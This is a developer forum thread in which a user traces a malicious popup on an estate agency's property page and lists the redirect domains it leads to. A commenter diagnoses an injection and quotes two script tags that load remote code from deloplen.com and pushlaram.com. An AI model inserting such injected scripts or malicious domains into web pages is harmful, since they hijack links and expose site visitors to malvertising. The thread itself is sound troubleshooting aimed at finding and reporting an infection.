2
Nanos
25d

I can't figure out if its google that is infected, or this website, or my machine.. (Only tested it on 2 PC's so far.)

Any pointers welcomed !

Appears for sure in MS Edge browser and Internet Explorer. (So make sure you have antivirus running/etc. or a sandbox machine/etc.)

I think the problem is with google...

Go to:

https://www.google.co.uk

Search for:

diamondestates.co.uk/property/wonderful-investment-opportunity-spacious-freehold-4-bedroom-3-reception-victorian-house/

Click on 'images'

Then click on the first picture.

Then click on the preview/etc. pane on the right in google, which takes you to the diamondestates website

Then click on the right arrow in the picture on the diamondestates website to go to the next picture, and bingo a popup !

Related URL's it takes you to include:

d2izun4ii6k9up.cloudfront.net/lendsolyanka/index.html

9rnndpb8.reactionpcservice.fun/prelandersysdefold_alert__1574952573/
index.html

deloplen.com/afu.php

https://joesandbox.com/analysis/...
> Analysis Report deloplen.com/afu.php

Useful input welcomed, and if anyone wants to inform the infected site they have an infection, please feel free to do so !

Last few times when I've tried to do that, people haven't understood me very well, and nowadays I'd worry they would think I had planted it, when I just want to tell them they have an infection !

I suspect its the diamondestates website, but if you go their directly, the infection doesn't popup, it only appears to happen if you go via google.

Comments
  • 1
    Here you are: *ptr

    Or do you prefer English pointer?
  • 0
    Probably neighter of your computer nor the website is infected directly, also google probably doesn't has anything related to the issue.
    For me it seems to be eighter some kind of xss, or a false positive result.
    Btw it's odd, that you have a C++ avatar, but write about don't understanding jokes about pointers.
  • 0
    @tman

    What's a pointer..

    I'm still learning C++ :-)
  • 0
    @tman

    > a false positive result.

    It can't be that, since it does open a dodgy popup !

    If it happens on someone else's machine, then its more likely to be the website (Or google..) that is infected.
  • 2
    It's the page, most likely a XSS injection. The main content of that page has two link hijackers at the very end:

    @highlight

    <section>

    <p>Diamond Estate Agency is delighted to present this SUPERB INVESTMENT OPPORTUNITY! Freehold unmodernised house on residential road near tube, buses and shops with enormous potential. It boasts 4 bedrooms, 3 reception rooms, kitchen and bathroom.</p>

    <p><span style="line-height: 27.2px;">Ideal for builder or investor.</span></p>

    <p>Full vacant possession offered.</p>

    <p>Viewing highly recommended!</p>

    <script type="text/javascript" src="//deloplen.com/apu.php?zoneid=2933250" async="" data-cfasync="false"></script>

    <script src="https://pushlaram.com/pfe/current/..." data-cfasync="false" async=""></script>

    </section>
  • 0
    @ethernetzero

    Thank you, most appreciated.
  • 0
    Someone said to me that experienced the same thing on their PC too.
  • 1
Add Comment